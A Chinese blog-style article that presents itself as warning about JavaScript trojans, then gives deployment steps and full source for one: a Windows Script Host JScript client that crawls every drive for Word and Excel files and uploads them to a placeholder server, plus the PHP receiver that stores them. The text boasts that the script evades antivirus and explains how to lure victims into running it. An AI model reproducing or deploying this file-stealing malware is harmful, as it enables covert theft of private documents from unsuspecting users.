导读:在日常电脑使用中,很多小伙伴都会从互联网下载网站或是QQ、微信等聊天软件中进行传输安装软件、文件等 。略知网络安全的朋友们都会比较谨慎所安装的软件是否安全,比如说通过杀毒软件杀毒、通过对文件的后缀、图标、大小等分析,那么这样的操作真的就是安全的吗?相信大家都对远程木马有所了解,名气最大的应该是灰鸽子远程木马,它就是通过后缀为exe文件诱导用户点击,从而造成个人隐私、文件的泄漏甚至金钱损失 。
文章插图
灰鸽子木马界面
随着互联网安全工具越来越成熟,对之前的exe木马文件的云查杀越发严格,基本上做过免杀的程序也挺不了多久就被发现,所以像这类的远程木马已经慢慢消失成为历史 。
文章插图
但是道高一尺魔高一丈,最新的远程木马通过新的途径新的方式悄然出现,它就是利用js代码来猎取你的电脑文件,更为可怕的是它可以通过逻辑代码自动地进入电脑文件中搜索预设好的文件后缀进行分析获取,比如说代码只想获取你的聊天记录,那么它会通过检索查找到QQ、微信等数据库文件上传获取、也可以通过查找相册等目录获取照片等隐私文件,危害还是非常大的,本期文章小君就对js木马进行分析,看它是如何获取文件的 。
文章插图
首先js木马的特点:优点:
- 文件小、js后缀善于隐藏,目前杀毒软件对它用处不大,可完全通过360安全 。
- 危害大,可以自动搜索目标文件获取 。
QQ传输引导中马时会自动改后缀名称,所以很大程度上是需要通过将js代码进行压缩后引导安装 。
使用方法:首先需要木马使用者搭建一台服务器,当然也可以是虚拟空间、vps等都是可以的,然后搭建php环境,大家都知道像灰鸽子这类远程木马都有客户端和服务端两部分,那么js木马同样也有,需要在PHP环境下上传服务端代码server.php文件,在网站目录下新建一个目录upload用于获取中马者的隐私文件,接下来就是将js代码也就是木马的客户端发送给被控者引导点击,如果成功点击,远程服务器将会开始不断收到上传的隐私文件 。
文章插图
效果图
代码分享:js木马客户端代码如下:
var __POSTURL__ = 'http://www.xxx.com/server.php';function UpFile(FilePath, FileName) {var Stream = new ActiveXObject('ADODB.Stream');Stream.Type = 1;Stream.Open();Stream.LoadFromFile(FilePath);var XHR = new ActiveXObject('Msxml2.XMLHTTP' || 'Microsoft.XMLHTTP');XHR.open('POST', __POSTURL__, false);XHR.setRequestHeader('fileName', FileName);XHR.setRequestHeader('enctype', 'multipart/form-data');XHR.send(Stream.Read());Stream.Close();return XHR.responseText}function GetDriveList() {var fso = new ActiveXObject("Scripting.FileSystemObject");var e = new Enumerator(fso.Drives);var re = [];for (; ! e.atEnd(); e.moveNext()) {if (e.item().IsReady) {re.push(e.item().DriveLetter)}}return re}function GetFolderList(folderspec) {var fso = new ActiveXObject("Scripting.FileSystemObject");var f = fso.GetFolder(folderspec);var fc = new Enumerator(f.SubFolders);var re = [];for (; ! fc.atEnd(); fc.moveNext()) {re.push(fc.item())}return re}function GetFileList(folderspec) {var fso = new ActiveXObject("Scripting.FileSystemObject");var f = fso.GetFolder(folderspec);var fc = new Enumerator(f.files);var re = [];for (; ! fc.atEnd(); fc.moveNext()) {re.push([fc.item(), fc.item().Name])}return re}function Search(Drive) {var FolderList = GetFolderList(Drive);for (var i = 0; i < FolderList.length; i++) {Search(FolderList[i])}var FileList = GetFileList(Drive);for (var i = 0; i < FileList.length; i++) {if (/.(doc|docx|xls|xlsx)$/i.test(FileList[i])) {UpFile(FileList[i][0], FileList[i][1])}}}function Load() {var WMIs = GetObject("winmgmts:\\.\root\cimv2");var Items = WMIs.ExecQuery("SELECT * FROM Win32_Process WHERE Name = 'wscript.exe'");var i = 0,rs = new Enumerator(Items);for (; ! rs.atEnd(); rs.moveNext()) {i++}if (i > 1) WScript.Quit(0);Items = WMIs = i = rs = null;var DriveList = GetDriveList();for (var i = 0; i < DriveList.length; i++) {Search(DriveList[i] + ":\\")}}Load();PHP服务端代码:<?phpif($_SERVER['REQUEST_METHOD'] == 'POST'){$fileName = uniqid(rand()) . '_' . iconv('utf-8', 'gbk', $_SERVER['HTTP_FILENAME']);print_r(file_put_contents("uploads/{$fileName}", $HTTP_RAW_POST_DATA));}?>
推荐阅读
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- 化妆品|警惕!韩国13种知名化妆品含“剧毒”!快看看有你正在用的?
- 卸妆油|聚美涵熙护肤:五招让你的护肤品露出原形
- 职业教育|阻碍事业六大忌!赶快来看看你的办公风水
- 好用Docker整理,有了这些容器你的Nas更出众
- 5秒内克隆你的声音,并生成任何内容,这个开源工具细思极恐
- |如果你的紫砂壶砂料、形体、做工是如实描述,那你应该赚了不少!
- 号称下一代监控系统,来看看它有多强
- 站着看你的精神活动
- 性格测试的细节取决于你的真实性格
- 看看你的身份证号藏哪些命理玄机
